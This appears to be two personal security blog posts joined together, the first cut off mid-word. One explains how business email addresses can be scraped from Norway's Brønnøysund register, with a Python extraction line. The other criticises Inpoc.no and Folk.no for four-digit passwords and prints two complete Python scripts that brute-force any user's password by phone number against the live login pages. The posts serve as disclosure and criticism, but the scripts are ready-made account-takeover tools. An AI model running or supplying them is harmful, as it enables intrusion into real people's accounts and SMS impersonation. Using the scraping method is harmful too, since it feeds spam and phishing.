I registered my sole proprietorship back in 2008, mostly to be able to register domains under the Norwegian TLD, .no. What I noticed from the very beg

The only place the said email address is used, is in the public company database which Brønnøysundregistrene keeps. Brønnøysundregistrene (English: Brønnøysund Register Centre) is the governmental agency responsible for business registrations in Norway.

What struck me as a bit impressive was how quickly the marketers seemed to pick up my email address. After doing a little bit of research, I realized that it is quite easy to harvest email addresses and other business information from the Brønnøysund Register Centre. According to a friend of mine who confronted a Brønnøysund Register Centre representative with this issue, they also sell company records to marketers. Spammers, marketers, phishers and others wanting this information without paying, can easily harvest it for free.

When changes happen within companies –  including new business registrations – they have to report to the Brønnøysund Register Center. This is considered public information, is posted online, and is even searchable. This link lists all the new business registrations between January 1st
and January 15th, 2012.

If we take a look at that last link, we will see that there were 1224 new business registrations between January 1st and January 15th. Taking a look at the source code, we see that it is very spider-friendly. The following company record, belonging to Firstrank AS,  is an example of a much criticized company that previously has been using email marketing to target Norwegian companies with unsolicited spam:

<td><p>FIRSTRANK AS</p></td>
<td>&nbsp;</td>
<td nowrap><p>977 036 410</p></td>
<td>&nbsp;</td>
<td nowrap><p>18.12.1996</p></td>

To collect email addresses, a marketer would first harvest the site for organization numbers. Organization numbers are nine digit numbers used to identify a company. After harvesting organization numbers, a marketer would then use these numbers to search the Brønnøysund Register Centre for company records.

For each organization number they would check, they would collect the contact email address of the company. The page where the company’s contact email address is specified, is also very spider-friendly:

<p>
<a href="mailto:post@firstrank.no">post@firstrank.no</a>
</p>

Going through the source automatically, one is able to extract only the interesting info very easily. For example, this line of Python uses RegEx to perform a greedy extract of the line of HTML containing the email address:

re.search('<a href="mailto:(.+)">', '<a href="mailto:post@firstrank.no">post@firstrank.no</a>').group(1)

Output:

post@firstrank.no

This should give you an idea of how easy it is to harvest email addresses belonging to Norwegian businesses.

I would suggest that the Brønnøysund Register Centre implements some kind of solution that makes it harder to harvest email addresses. An example of such solution would be to use OCR-proof images instead of just plain text, although it is not text-to-speech friendly.

As I am not a big fan of unsolicited emailing, I will from now on post some of the spam emails I receive and dig up as much information about the sender as possible to put them in a bad light.

Naturally, you’re aware of this and you’re trying your very best to use strong passwords all around. While this indeed is a good practise, it’s not always possible. Some websites and systems may actually force you to use insecure and sometimes unchangeable passwords. Examples of such websites are Folk.no and Inpoc.no. Both sites are owned by a company named Aspiro AS, which again is owned by Schibsted; a quite big Norwegian media conglomerate.

Inpoc used to be one of the most popular Norwegian mobile phone content providers, offering products such as ringtones, screensavers and games for mobile phones. They were also quite big in offering free SMSes online. Today, sites like Biip.no have taken over, but Inpoc still seems to be semi-popular; especially for sending free SMSes online.

Folk.no is also owned by Aspiro (Schibsted) and is basically a site to help find information about people, such as phone numbers, addresses, websites. They also provide profile sites for members, making them able to serve even more information about people. Inpoc.no and Folk.no obviously share the same user database and members of Inpoc have to log into Folk.no to send SMSes, which brings us back to the main point of this blog entry.

When registering at Inpoc or Folk.no, you get a passcode of four digits sent as an SMS to your cellphone. This passcode is used to verify that you’re the actual owner of the number you’re trying to sign up with. After verifying this on the site, you get to log in with the very same four digits as your permanent password. As if that’s not bad enough, you don’t even get to change your password to a secure one! You’re forced to choose a password consisting of four digits – no other characters are allowed.

If you’ve forgotten your password, you may request it and have it sent as an SMS to your phone. This basically means that all the passwords in the database are in cleartext. Not that it actually matters with such a horrible password policy.

This made me go get some coffee and open up a Python shell and Notepad++. Half an hour later, I came up with this piece of messy code:

import urllib
import re
 
phonenumber	=	raw_input('Enter phone number: ')
status		=	1
 
for num in range(0,10000):
	if status == 0:
		break
	else:
		if(len(str(num)) == 1):
			num	=	'000' + str(num)
		if(len(str(num)) == 2):
			num	=	'00' + str(num)
		if(len(str(num)) == 3):
			num =	'0' + str(num)
 
		print '\n' * 1000
		print 'Trying ' + str(num)
		params			=	{}
		params['vsp_username']	=	phonenumber
		params['vsp_password']	=	num
		params			=	urllib.urlencode(params)
		runit			=	urllib.urlopen('http://inpoc.no/?read=true&read=true', params)
		runitstr		=	runit.read()
		for word in runitstr.split():
			word	=	word.replace("\n", "")
			word	=	word.replace("\t", "")
			find	=	re.match('id="tc"><h1>Logget', word)
			if find:
				print '\n' * 1000
				print 'Tries: ' + str(num)
				print 'Password is ' + str(num)
				status	=	0
				break
			else:
				pass

Note that the apostrophes are converted to primes (WordPress security measure) so you might have some difficulty running it out of the box. Downloadable version available here, py2exe compiled version available here.

To explain the code: It takes the phone number, loops from 0000 through 9999 and tries to log in with the current position of the loop as the password. If it’s successful, the password is printed out. Its speed is in average about 60 tries per minute, 1 per second. This means that it’ll take about 166 minutes or 2 hours and 46 minutes to try every password from 0 to 9999. Since they do not have any maximum limit of how many times you’re allowed to enter an incorrect password, you’re pretty much guaranteed to find somebody’s password.

import urllib
import re
 
phonenumber	=	raw_input('Enter phone number: ')
status		=	1
 
for num in range(0,10000):
	if status == 0:
		break
	else:
		if(len(str(num)) == 1):
			num	=	'000' + str(num)
		if(len(str(num)) == 2):
			num	=	'00' + str(num)
		if(len(str(num)) == 3):
			num =	'0' + str(num)
 
		print '\n' * 1000
		print 'Tries ' + str(num)
		params			=	{}
		params['f_cellnumber']	=	phonenumber
		params['f_password']	=	num
		params['Submit.x']	=	0
		params['Submit.y']	=	0
		params['Submit']	=	'Submit'
		params			=	urllib.urlencode(params)
		runit			=	urllib.urlopen('http://folk.inpoc.no/index.ftl', params)
		runitstr		=	runit.read()
		for word in runitstr.split():
			word	=	word.replace("\n", "")
			word	=	word.replace("\t", "")
			find	=	re.match('(.+)loggout.ftl">', word)
			if find:
				print '\n' * 1000
				print 'Tries: ' + str(num)
				print 'Password is ' + str(num)
				status	=	0
				break
			else:
				pass

As if that’s not enough: It’s even twice as fast as the Inpoc brute! At 120 tries per minute or 2 per second, it’ll take about 80 minutes or 1 hour and 20 minutes to finish trying every possible password. And it’ll finish a lot earlier if the password is, for instance, 2852.
Downloadable version available here, py2exe compiled version available here.
The conclusion should be pretty easy to foresee: Slap yourselves, developers of Inpoc.no and Folk.no! Why on earth would you force the users to use a four digit password? I really can’t see any reason at all to do this. Laziness is perhaps one reason, but one would expect better solutions from such big companies. You might say that if someone gets access to another person’s account, they’re not able to do much harm. While this perhaps is true, sending SMSes from another person’s phone number could still cause some harm. Also, this is not how you protect people’s privacy.

What would happen if these developers were to make systems with more sensitive information and with the same password policies?

We’ll see.